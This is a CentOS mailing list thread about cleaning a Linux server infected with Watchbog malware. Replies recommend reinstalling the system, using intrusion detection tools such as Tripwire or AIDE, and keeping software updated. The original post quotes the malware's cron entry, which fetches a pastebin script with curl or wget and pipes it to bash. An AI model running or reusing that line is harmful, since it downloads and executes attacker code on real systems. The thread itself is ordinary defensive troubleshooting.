On 17 December 2018 9:58:03 p.m. "Pete Biggs" <pete@xxxxxxxxxxxx> wrote:
Is there a way to find out how the CentOS 7.5 Linux box got infected with
malware?
Currently i am referring to
http://sudhakarbellamkonda.blogspot.com/2018/11/blocking-watchbog-malwareransomware.html
to carry out the below steps and is done manually.
1)rm -fr /tmp/*timesyncc.service*
2)crontab -e -u apigee
delete the cron entry
*/1 * * * * (curl -fsSL https://pastebin.com/raw/aGTSGJJp||wget -q -O-
https://pastebin.com/raw/aGTSGJJp)|bash > /dev/null 2>&1
3)ps aux | grep watchbog
kill -9 pidof watchbog
Any suggestions or recommendations to find out how CentOS 7.5 Linux box got
infected with Watchbog Malware.
Well, if the infected crontab is owned by user 'apigee' then it would
suggest that whatever runs as that user is the source of the infection.
The malware appears to try to elevate its privs, and if it's successful
it modifies various system files. What you are seeing in the 'apigee'
crontab is just the tip of the iceberg.
It is unlikely that what is in that blog will successfully get rid of
all the malware - it will probably stop it running, but your system
will still have the malware on it and it may have left other backdoors
into your system.
The *ONLY* way of being sure your system is clean is to wipe and
reinstall. (And make sure that if you restore from backup, that the
backup is clean.)
Is there any open source software which can
be installed on CentOS 7.5 Linux box to detect and prevent Malware?
Yes, lots, although most centre around detecting the intrusion rather
than preventing it - the classic way of detecting intrusions in the
past has been Tripwire, but it's a long time since I used it and there
are no doubt better things around. Search for "linux intrusion
detection tools".
For prevention, by far the best way is to keep your system and
application software up to date. The intrusions work by elevating
privilege to root, and that elevation requires either a knowledge of
passwords/keys or the ability to leverage vulnerabilities. The first is
mitigated by strong passwords and proper security housekeeping; the
second by regularly updating your system especially with security
updates.
P.
_______________________________________________
CentOS mailing list
CentOS@xxxxxxxxxx
https://lists.centos.org/mailman/listinfo/centos
AIDE is the closest equiv to tripwire on centos.
regards peter
Sent with AquaMail for Android
https://www.mobisystems.com/aqua-mail
_______________________________________________
CentOS mailing list
CentOS@xxxxxxxxxx
https://lists.centos.org/mailman/listinfo/centos
